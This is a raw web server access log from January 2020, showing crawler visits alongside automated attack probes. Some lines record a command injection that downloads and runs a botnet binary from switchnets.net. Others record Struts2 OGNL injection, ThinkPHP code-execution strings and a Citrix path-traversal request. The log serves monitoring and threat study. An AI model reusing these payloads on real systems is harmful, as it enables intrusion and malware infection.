80.82.68.17 - - [14/Jan/2020:08:34:10 +0100] "GET / HTTP/1.1" 200 41 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36"
80.82.68.17 - - [14/Jan/2020:08:34:10 +0100] "GET /robots.txt HTTP/1.1" 404 564 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36"
80.82.68.17 - - [14/Jan/2020:08:34:10 +0100] "GET /favicon.ico HTTP/1.1" 404 564 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36"
24.20.224.75 - - [14/Jan/2020:08:51:45 +0100] "GET / HTTP/1.1" 200 41 "-" "-"
66.249.76.99 - - [14/Jan/2020:09:11:51 +0100] "GET /robots.txt HTTP/1.1" 404 136 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.76.101 - - [14/Jan/2020:09:11:52 +0100] "GET / HTTP/1.1" 200 65 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
49.48.141.104 - - [14/Jan/2020:10:49:30 +0100] "GET / HTTP/1.1" 200 41 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
190.83.208.15 - - [14/Jan/2020:11:12:39 +0100] "GET / HTTP/1.1" 400 166 "-" "-"
37.235.25.170 - - [14/Jan/2020:11:31:27 +0100] "GET / HTTP/1.1" 200 41 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
47.201.1.253 - - [14/Jan/2020:11:35:39 +0100] "GET / HTTP/1.1" 400 166 "-" "-"
201.238.155.186 - - [14/Jan/2020:12:17:58 +0100] "GET / HTTP/1.1" 200 41 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
69.162.92.86 - - [14/Jan/2020:12:55:52 +0100] "HEAD /robots.txt HTTP/1.0" 404 0 "-" "-"
157.230.210.224 - - [14/Jan/2020:13:23:32 +0100] "GET /wp-login.php HTTP/1.1" 404 136 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0"
74.63.227.26 - - [14/Jan/2020:13:48:05 +0100] "HEAD /robots.txt HTTP/1.0" 404 0 "-" "-"
45.143.220.139 - - [14/Jan/2020:14:01:02 +0100] "GET / HTTP/1.1" 200 65 "-" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
45.143.220.139 - - [14/Jan/2020:14:01:02 +0100] "GET /HNAP1/ HTTP/1.1" 404 136 "http://160.53.247.74/" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
35.160.32.44 - - [14/Jan/2020:14:04:06 +0100] "GET / HTTP/1.1" 200 65 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.181 Safari/537.36"
54.36.149.11 - - [14/Jan/2020:15:53:45 +0100] "GET /robots.txt HTTP/1.1" 404 136 "-" "Mozilla/5.0 (compatible; AhrefsBot/6.1; +http://ahrefs.com/robot/)"
54.36.148.148 - - [14/Jan/2020:15:53:46 +0100] "GET /166-la-mythique-game-boy-fete-ses-25-ans HTTP/1.1" 404 136 "-" "Mozilla/5.0 (compatible; AhrefsBot/6.1; +http://ahrefs.com/robot/)"
217.197.215.219 - - [14/Jan/2020:16:06:31 +0100] "GET / HTTP/1.0" 200 41 "-" "-"
217.197.215.219 - - [14/Jan/2020:16:06:34 +0100] "GET / HTTP/1.0" 200 41 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"
217.197.215.219 - - [14/Jan/2020:16:06:38 +0100] "GET / HTTP/1.1" 200 41 "-" "-"
217.197.215.219 - - [14/Jan/2020:16:07:06 +0100] "GET / HTTP/1.1" 200 41 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"
179.106.103.73 - - [14/Jan/2020:16:26:21 +0100] "GET / HTTP/1.1" 200 41 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7"
201.220.170.20 - - [14/Jan/2020:16:54:41 +0100] "GET / HTTP/1.1" 200 41 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7"
27.125.175.117 - - [14/Jan/2020:17:12:18 +0100] "GET / HTTP/1.1" 400 166 "-" "-"
88.249.244.160 - - [14/Jan/2020:17:42:26 +0100] "GET / HTTP/1.0" 200 41 "-" "-"
200.203.46.205 - - [14/Jan/2020:18:02:00 +0100] "GET / HTTP/1.1" 400 166 "-" "-"
3.234.215.137 - - [14/Jan/2020:18:49:16 +0100] "GET /robots.txt HTTP/1.1" 404 136 "-" "CCBot/2.0 (https://commoncrawl.org/faq/)"
3.234.215.137 - - [14/Jan/2020:18:49:16 +0100] "GET / HTTP/1.1" 200 65 "-" "CCBot/2.0 (https://commoncrawl.org/faq/)"
157.55.39.19 - - [14/Jan/2020:18:55:09 +0100] "GET /robots.txt HTTP/1.1" 404 136 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
207.46.13.49 - - [14/Jan/2020:18:55:33 +0100] "GET / HTTP/1.1" 304 0 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
66.249.64.109 - - [14/Jan/2020:19:07:51 +0100] "GET /ads.txt HTTP/1.1" 404 136 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
54.36.150.77 - - [14/Jan/2020:19:51:48 +0100] "GET /120-firefox-29-beta-la-nouvelle-interface-utilisateur-arrive-enfin HTTP/1.1" 404 136 "-" "Mozilla/5.0 (compatible; AhrefsBot/6.1; +http://ahrefs.com/robot/)"
46.99.178.221 - - [14/Jan/2020:19:52:58 +0100] "GET / HTTP/1.1" 200 41 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
185.253.200.150 - - [14/Jan/2020:20:10:51 +0100] "GET / HTTP/1.1" 200 41 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
54.36.150.119 - - [14/Jan/2020:20:25:20 +0100] "GET / HTTP/1.1" 200 65 "-" "Mozilla/5.0 (compatible; AhrefsBot/6.1; +http://ahrefs.com/robot/)"
177.67.8.14 - - [14/Jan/2020:22:09:48 +0100] "GET / HTTP/1.1" 200 41 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7"
31.196.62.82 - - [14/Jan/2020:22:20:30 +0100] "GET /card_scan_decoder.php?No=30&door=%60wget http://switchnets.net/hoho.arm7; chmod 777 hoho.arm7; ./hoho.arm7 linear%60 HTTP/1.1" 400 166 "-" "dark_NeXus_Qbot/4.0 (compatible; MSIE5.01; minerword NT)"
54.36.150.171 - - [14/Jan/2020:22:53:45 +0100] "GET /110-microsoft-la-tablette-surface-2-debarque-en-version-4g HTTP/1.1" 404 136 "-" "Mozilla/5.0 (compatible; AhrefsBot/6.1; +http://ahrefs.com/robot/)"
193.159.60.45 - - [14/Jan/2020:23:40:36 +0100] "GET / HTTP/1.0" 200 41 "-" "-"
181.93.86.24 - - [15/Jan/2020:00:16:28 +0100] "GET / HTTP/1.0" 200 41 "-" "-"
69.162.126.238 - - [15/Jan/2020:00:27:43 +0100] "HEAD /robots.txt HTTP/1.0" 404 0 "-" "-"
31.223.123.152 - - [15/Jan/2020:00:36:51 +0100] "GET / HTTP/1.1" 200 41 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
103.139.2.240 - - [15/Jan/2020:01:20:03 +0100] "GET / HTTP/1.1" 200 65 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36"
103.139.2.240 - - [15/Jan/2020:01:20:15 +0100] "POST / HTTP/1.1" 405 166 "-" "python-requests/2.12.4"
103.139.2.240 - - [15/Jan/2020:01:20:21 +0100] "POST /index.action HTTP/1.1" 404 136 "-" "python-requests/2.12.4"
103.139.2.240 - - [15/Jan/2020:01:20:22 +0100] "POST /login.action HTTP/1.1" 404 136 "-" "python-requests/2.12.4"
103.139.2.240 - - [15/Jan/2020:01:20:23 +0100] "POST /index.do HTTP/1.1" 404 136 "-" "python-requests/2.12.4"
103.139.2.240 - - [15/Jan/2020:01:20:32 +0100] "POST /index.jsp HTTP/1.1" 404 136 "-" "python-requests/2.12.4"
103.139.2.240 - - [15/Jan/2020:01:20:35 +0100] "POST /login.do HTTP/1.1" 404 136 "-" "python-requests/2.12.4"
103.139.2.240 - - [15/Jan/2020:01:20:38 +0100] "POST /login.jsp HTTP/1.1" 404 136 "-" "python-requests/2.12.4"
103.139.2.240 - - [15/Jan/2020:01:20:41 +0100] "POST /main.jsp HTTP/1.1" 404 136 "-" "python-requests/2.12.4"
103.139.2.240 - - [15/Jan/2020:01:20:44 +0100] "POST /default.jsp HTTP/1.1" 404 136 "-" "python-requests/2.12.4"
103.139.2.240 - - [15/Jan/2020:01:20:46 +0100] "POST /register.jsp HTTP/1.1" 404 136 "-" "python-requests/2.12.4"
103.139.2.240 - - [15/Jan/2020:01:20:50 +0100] "POST /login/login.jsp HTTP/1.1" 404 136 "-" "python-requests/2.12.4"
103.139.2.240 - - [15/Jan/2020:01:20:53 +0100] "POST /login/indexAction.action HTTP/1.1" 404 136 "-" "python-requests/2.12.4"
103.139.2.240 - - [15/Jan/2020:01:20:58 +0100] "POST /indexAction.action HTTP/1.1" 404 136 "-" "python-requests/2.12.4"
103.139.2.240 - - [15/Jan/2020:01:21:01 +0100] "POST / HTTP/1.1" 405 166 "-" "python-requests/2.12.4"
103.139.2.240 - - [15/Jan/2020:01:21:04 +0100] "POST /index.action HTTP/1.1" 404 136 "-" "python-requests/2.12.4"
103.139.2.240 - - [15/Jan/2020:01:21:07 +0100] "POST /login.action HTTP/1.1" 404 136 "-" "python-requests/2.12.4"
103.139.2.240 - - [15/Jan/2020:01:21:11 +0100] "POST /index.do HTTP/1.1" 404 136 "-" "python-requests/2.12.4"
103.139.2.240 - - [15/Jan/2020:01:21:15 +0100] "POST /index.jsp HTTP/1.1" 404 136 "-" "python-requests/2.12.4"
103.139.2.240 - - [15/Jan/2020:01:21:18 +0100] "POST /login.do HTTP/1.1" 404 136 "-" "python-requests/2.12.4"
103.139.2.240 - - [15/Jan/2020:01:21:21 +0100] "POST /login.jsp HTTP/1.1" 404 136 "-" "python-requests/2.12.4"
103.139.2.240 - - [15/Jan/2020:01:21:23 +0100] "POST /main.jsp HTTP/1.1" 404 136 "-" "python-requests/2.12.4"
103.139.2.240 - - [15/Jan/2020:01:21:27 +0100] "POST /default.jsp HTTP/1.1" 404 136 "-" "python-requests/2.12.4"
103.139.2.240 - - [15/Jan/2020:01:21:30 +0100] "POST /register.jsp HTTP/1.1" 404 136 "-" "python-requests/2.12.4"
103.139.2.240 - - [15/Jan/2020:01:21:33 +0100] "POST /login/login.jsp HTTP/1.1" 404 136 "-" "python-requests/2.12.4"
103.139.2.240 - - [15/Jan/2020:01:21:36 +0100] "POST /login/indexAction.action HTTP/1.1" 404 136 "-" "python-requests/2.12.4"
103.139.2.240 - - [15/Jan/2020:01:21:40 +0100] "POST /indexAction.action HTTP/1.1" 404 136 "-" "python-requests/2.12.4"
103.139.2.240 - - [15/Jan/2020:01:21:43 +0100] "POST / HTTP/1.1" 405 166 "-" "python-requests/2.12.4"
103.139.2.240 - - [15/Jan/2020:01:21:45 +0100] "POST /index.action HTTP/1.1" 404 136 "-" "python-requests/2.12.4"
103.139.2.240 - - [15/Jan/2020:01:21:58 +0100] "POST / HTTP/1.1" 405 166 "-" "python-requests/2.12.4"
103.139.2.240 - - [15/Jan/2020:01:22:11 +0100] "POST / HTTP/1.1" 405 166 "-" "python-requests/2.12.4"
103.139.2.240 - - [15/Jan/2020:01:22:14 +0100] "POST /index.action HTTP/1.1" 404 136 "-" "python-requests/2.12.4"
103.139.2.240 - - [15/Jan/2020:01:22:28 +0100] "GET //%28%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS%29%3f(%23req%3d%40org.apache.struts2.ServletActionContext%40getRequest(),%23wr%3d%23context%5b%23parameters.obj%5b0%5d%5d.getWriter(),%23wr.println(%23req.getRealPath(%23parameters.pp%5B0%5D)),%23wr.flush(),%23wr.close()):xx.toString.json?&obj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&pp=%2f HTTP/1.1" 404 136 "-" "python-requests/2.12.4"
103.139.2.240 - - [15/Jan/2020:01:22:32 +0100] "GET /index.action/%28%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS%29%3f(%23req%3d%40org.apache.struts2.ServletActionContext%40getRequest(),%23wr%3d%23context%5b%23parameters.obj%5b0%5d%5d.getWriter(),%23wr.println(%23req.getRealPath(%23parameters.pp%5B0%5D)),%23wr.flush(),%23wr.close()):xx.toString.json?&obj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&pp=%2f HTTP/1.1" 404 136 "-" "python-requests/2.12.4"
103.139.2.240 - - [15/Jan/2020:01:22:35 +0100] "GET /login.action/%28%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS%29%3f(%23req%3d%40org.apache.struts2.ServletActionContext%40getRequest(),%23wr%3d%23context%5b%23parameters.obj%5b0%5d%5d.getWriter(),%23wr.println(%23req.getRealPath(%23parameters.pp%5B0%5D)),%23wr.flush(),%23wr.close()):xx.toString.json?&obj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&pp=%2f HTTP/1.1" 404 136 "-" "python-requests/2.12.4"
103.139.2.240 - - [15/Jan/2020:01:22:40 +0100] "GET /index.do/%28%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS%29%3f(%23req%3d%40org.apache.struts2.ServletActionContext%40getRequest(),%23wr%3d%23context%5b%23parameters.obj%5b0%5d%5d.getWriter(),%23wr.println(%23req.getRealPath(%23parameters.pp%5B0%5D)),%23wr.flush(),%23wr.close()):xx.toString.json?&obj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&pp=%2f HTTP/1.1" 404 136 "-" "python-requests/2.12.4"
103.139.2.240 - - [15/Jan/2020:01:22:44 +0100] "GET /index.jsp/%28%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS%29%3f(%23req%3d%40org.apache.struts2.ServletActionContext%40getRequest(),%23wr%3d%23context%5b%23parameters.obj%5b0%5d%5d.getWriter(),%23wr.println(%23req.getRealPath(%23parameters.pp%5B0%5D)),%23wr.flush(),%23wr.close()):xx.toString.json?&obj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&pp=%2f HTTP/1.1" 404 136 "-" "python-requests/2.12.4"
103.139.2.240 - - [15/Jan/2020:01:22:48 +0100] "GET /login.do/%28%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS%29%3f(%23req%3d%40org.apache.struts2.ServletActionContext%40getRequest(),%23wr%3d%23context%5b%23parameters.obj%5b0%5d%5d.getWriter(),%23wr.println(%23req.getRealPath(%23parameters.pp%5B0%5D)),%23wr.flush(),%23wr.close()):xx.toString.json?&obj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&pp=%2f HTTP/1.1" 404 136 "-" "python-requests/2.12.4"
103.139.2.240 - - [15/Jan/2020:01:22:53 +0100] "GET /login.jsp/%28%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS%29%3f(%23req%3d%40org.apache.struts2.ServletActionContext%40getRequest(),%23wr%3d%23context%5b%23parameters.obj%5b0%5d%5d.getWriter(),%23wr.println(%23req.getRealPath(%23parameters.pp%5B0%5D)),%23wr.flush(),%23wr.close()):xx.toString.json?&obj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&pp=%2f HTTP/1.1" 404 136 "-" "python-requests/2.12.4"
103.139.2.240 - - [15/Jan/2020:01:22:57 +0100] "GET /main.jsp/%28%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS%29%3f(%23req%3d%40org.apache.struts2.ServletActionContext%40getRequest(),%23wr%3d%23context%5b%23parameters.obj%5b0%5d%5d.getWriter(),%23wr.println(%23req.getRealPath(%23parameters.pp%5B0%5D)),%23wr.flush(),%23wr.close()):xx.toString.json?&obj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&pp=%2f HTTP/1.1" 404 136 "-" "python-requests/2.12.4"
103.139.2.240 - - [15/Jan/2020:01:23:01 +0100] "GET /default.jsp/%28%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS%29%3f(%23req%3d%40org.apache.struts2.ServletActionContext%40getRequest(),%23wr%3d%23context%5b%23parameters.obj%5b0%5d%5d.getWriter(),%23wr.println(%23req.getRealPath(%23parameters.pp%5B0%5D)),%23wr.flush(),%23wr.close()):xx.toString.json?&obj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&pp=%2f HTTP/1.1" 404 136 "-" "python-requests/2.12.4"
103.139.2.240 - - [15/Jan/2020:01:23:06 +0100] "GET /register.jsp/%28%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS%29%3f(%23req%3d%40org.apache.struts2.ServletActionContext%40getRequest(),%23wr%3d%23context%5b%23parameters.obj%5b0%5d%5d.getWriter(),%23wr.println(%23req.getRealPath(%23parameters.pp%5B0%5D)),%23wr.flush(),%23wr.close()):xx.toString.json?&obj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&pp=%2f HTTP/1.1" 404 136 "-" "python-requests/2.12.4"
103.139.2.240 - - [15/Jan/2020:01:23:10 +0100] "GET /login/login.jsp/%28%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS%29%3f(%23req%3d%40org.apache.struts2.ServletActionContext%40getRequest(),%23wr%3d%23context%5b%23parameters.obj%5b0%5d%5d.getWriter(),%23wr.println(%23req.getRealPath(%23parameters.pp%5B0%5D)),%23wr.flush(),%23wr.close()):xx.toString.json?&obj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&pp=%2f HTTP/1.1" 404 136 "-" "python-requests/2.12.4"
103.139.2.240 - - [15/Jan/2020:01:23:14 +0100] "GET /login/indexAction.action/%28%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS%29%3f(%23req%3d%40org.apache.struts2.ServletActionContext%40getRequest(),%23wr%3d%23context%5b%23parameters.obj%5b0%5d%5d.getWriter(),%23wr.println(%23req.getRealPath(%23parameters.pp%5B0%5D)),%23wr.flush(),%23wr.close()):xx.toString.json?&obj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&pp=%2f HTTP/1.1" 404 136 "-" "python-requests/2.12.4"
103.139.2.240 - - [15/Jan/2020:01:23:18 +0100] "GET /indexAction.action/%28%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS%29%3f(%23req%3d%40org.apache.struts2.ServletActionContext%40getRequest(),%23wr%3d%23context%5b%23parameters.obj%5b0%5d%5d.getWriter(),%23wr.println(%23req.getRealPath(%23parameters.pp%5B0%5D)),%23wr.flush(),%23wr.close()):xx.toString.json?&obj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&pp=%2f HTTP/1.1" 404 136 "-" "python-requests/2.12.4"
103.139.2.240 - - [15/Jan/2020:01:23:22 +0100] "POST / HTTP/1.1" 405 166 "-" "python-requests/2.12.4"
103.139.2.240 - - [15/Jan/2020:01:23:27 +0100] "POST /index.action HTTP/1.1" 404 136 "-" "python-requests/2.12.4"
103.139.2.240 - - [15/Jan/2020:01:23:31 +0100] "POST /login.action HTTP/1.1" 404 136 "-" "python-requests/2.12.4"
103.139.2.240 - - [15/Jan/2020:01:23:35 +0100] "POST /index.do HTTP/1.1" 404 136 "-" "python-requests/2.12.4"
103.139.2.240 - - [15/Jan/2020:01:23:40 +0100] "POST /index.jsp HTTP/1.1" 404 136 "-" "python-requests/2.12.4"
103.139.2.240 - - [15/Jan/2020:01:23:44 +0100] "POST /login.do HTTP/1.1" 404 136 "-" "python-requests/2.12.4"
103.139.2.240 - - [15/Jan/2020:01:23:48 +0100] "POST /login.jsp HTTP/1.1" 404 136 "-" "python-requests/2.12.4"
103.139.2.240 - - [15/Jan/2020:01:23:53 +0100] "POST /main.jsp HTTP/1.1" 404 136 "-" "python-requests/2.12.4"
103.139.2.240 - - [15/Jan/2020:01:23:57 +0100] "POST /default.jsp HTTP/1.1" 404 136 "-" "python-requests/2.12.4"
103.139.2.240 - - [15/Jan/2020:01:24:02 +0100] "POST /register.jsp HTTP/1.1" 404 136 "-" "python-requests/2.12.4"
103.139.2.240 - - [15/Jan/2020:01:24:07 +0100] "POST /login/login.jsp HTTP/1.1" 404 136 "-" "python-requests/2.12.4"
103.139.2.240 - - [15/Jan/2020:01:24:12 +0100] "POST /login/indexAction.action HTTP/1.1" 404 136 "-" "python-requests/2.12.4"
103.139.2.240 - - [15/Jan/2020:01:24:16 +0100] "POST /indexAction.action HTTP/1.1" 404 136 "-" "python-requests/2.12.4"
103.139.2.240 - - [15/Jan/2020:01:24:21 +0100] "GET /?debug=browser&object=(%23_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)%3f(%23context%5B%23parameters.rpsobj%5B0%5D%5D.getWriter().println(%23context%5B%23parameters.reqobj%5B0%5D%5D.getRealPath(%23parameters.pp%5B0%5D))):sb.toString.json&rpsobj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&command=Is-Struts2-Vul-URL&pp=%2f&reqobj=com.opensymphony.xwork2.dispatcher.HttpServletRequest HTTP/1.1" 200 65 "-" "python-requests/2.12.4"
103.139.2.240 - - [15/Jan/2020:01:24:26 +0100] "GET /index.action?debug=browser&object=(%23_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)%3f(%23context%5B%23parameters.rpsobj%5B0%5D%5D.getWriter().println(%23context%5B%23parameters.reqobj%5B0%5D%5D.getRealPath(%23parameters.pp%5B0%5D))):sb.toString.json&rpsobj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&command=Is-Struts2-Vul-URL&pp=%2f&reqobj=com.opensymphony.xwork2.dispatcher.HttpServletRequest HTTP/1.1" 404 136 "-" "python-requests/2.12.4"
103.139.2.240 - - [15/Jan/2020:01:24:31 +0100] "GET /login.action?debug=browser&object=(%23_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)%3f(%23context%5B%23parameters.rpsobj%5B0%5D%5D.getWriter().println(%23context%5B%23parameters.reqobj%5B0%5D%5D.getRealPath(%23parameters.pp%5B0%5D))):sb.toString.json&rpsobj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&command=Is-Struts2-Vul-URL&pp=%2f&reqobj=com.opensymphony.xwork2.dispatcher.HttpServletRequest HTTP/1.1" 404 136 "-" "python-requests/2.12.4"
103.139.2.240 - - [15/Jan/2020:01:24:36 +0100] "GET /index.do?debug=browser&object=(%23_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)%3f(%23context%5B%23parameters.rpsobj%5B0%5D%5D.getWriter().println(%23context%5B%23parameters.reqobj%5B0%5D%5D.getRealPath(%23parameters.pp%5B0%5D))):sb.toString.json&rpsobj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&command=Is-Struts2-Vul-URL&pp=%2f&reqobj=com.opensymphony.xwork2.dispatcher.HttpServletRequest HTTP/1.1" 404 136 "-" "python-requests/2.12.4"
103.139.2.240 - - [15/Jan/2020:01:24:41 +0100] "GET /index.jsp?debug=browser&object=(%23_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)%3f(%23context%5B%23parameters.rpsobj%5B0%5D%5D.getWriter().println(%23context%5B%23parameters.reqobj%5B0%5D%5D.getRealPath(%23parameters.pp%5B0%5D))):sb.toString.json&rpsobj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&command=Is-Struts2-Vul-URL&pp=%2f&reqobj=com.opensymphony.xwork2.dispatcher.HttpServletRequest HTTP/1.1" 404 136 "-" "python-requests/2.12.4"
103.139.2.240 - - [15/Jan/2020:01:24:46 +0100] "GET /login.do?debug=browser&object=(%23_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)%3f(%23context%5B%23parameters.rpsobj%5B0%5D%5D.getWriter().println(%23context%5B%23parameters.reqobj%5B0%5D%5D.getRealPath(%23parameters.pp%5B0%5D))):sb.toString.json&rpsobj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&command=Is-Struts2-Vul-URL&pp=%2f&reqobj=com.opensymphony.xwork2.dispatcher.HttpServletRequest HTTP/1.1" 404 136 "-" "python-requests/2.12.4"
93.179.66.36 - - [15/Jan/2020:02:13:16 +0100] "GET / HTTP/1.1" 400 166 "-" "-"
181.92.243.17 - - [15/Jan/2020:02:20:14 +0100] "GET / HTTP/1.1" 400 166 "-" "-"
54.36.148.33 - - [15/Jan/2020:02:23:51 +0100] "GET /robots.txt HTTP/1.1" 404 136 "-" "Mozilla/5.0 (compatible; AhrefsBot/6.1; +http://ahrefs.com/robot/)"
54.36.150.21 - - [15/Jan/2020:02:23:51 +0100] "GET / HTTP/1.1" 200 65 "-" "Mozilla/5.0 (compatible; AhrefsBot/6.1; +http://ahrefs.com/robot/)"
3.19.120.216 - - [15/Jan/2020:02:28:23 +0100] "GET / HTTP/1.1" 200 41 "-" "-"
3.19.120.216 - - [15/Jan/2020:02:28:28 +0100] "" 400 0 "-" "-"
47.95.196.122 - - [15/Jan/2020:02:36:34 +0100] "GET /TP/public/index.php HTTP/1.1" 404 136 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)"
80.19.63.97 - - [15/Jan/2020:03:52:04 +0100] "GET /card_scan_decoder.php?No=30&door=%60wget http://switchnets.net/hoho.arm7; chmod 777 hoho.arm7; ./hoho.arm7 linear%60 HTTP/1.1" 400 166 "-" "dark_NeXus_Qbot/4.0 (compatible; MSIE5.01; minerword NT)"
190.98.184.38 - - [15/Jan/2020:03:53:18 +0100] "GET / HTTP/1.1" 200 41 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
128.14.134.170 - - [15/Jan/2020:04:11:28 +0100] "GET / HTTP/1.1" 200 65 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
109.94.123.183 - - [15/Jan/2020:04:46:02 +0100] "GET / HTTP/1.1" 200 41 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
5.101.0.209 - - [15/Jan/2020:04:51:37 +0100] "GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1" 200 65 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
5.101.0.209 - - [15/Jan/2020:04:51:37 +0100] "GET /index.php?s=/Index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP HTTP/1.1" 404 193 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
5.101.0.209 - - [15/Jan/2020:04:51:37 +0100] "GET /solr/admin/info/system?wt=json HTTP/1.1" 404 193 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
5.101.0.209 - - [15/Jan/2020:04:51:40 +0100] "GET /?a=fetch&content=<php>die(@md5(HelloThinkCMF))</php> HTTP/1.1" 200 65 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
5.101.0.209 - - [15/Jan/2020:04:51:54 +0100] "GET /vpn/../vpns/cfg/smb.conf HTTP/1.1" 404 193 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
54.36.150.70 - - [15/Jan/2020:05:39:30 +0100] "GET /108-firefox-28-est-disponible HTTP/1.1" 404 136 "-" "Mozilla/5.0 (compatible; AhrefsBot/6.1; +http://ahrefs.com/robot/)"
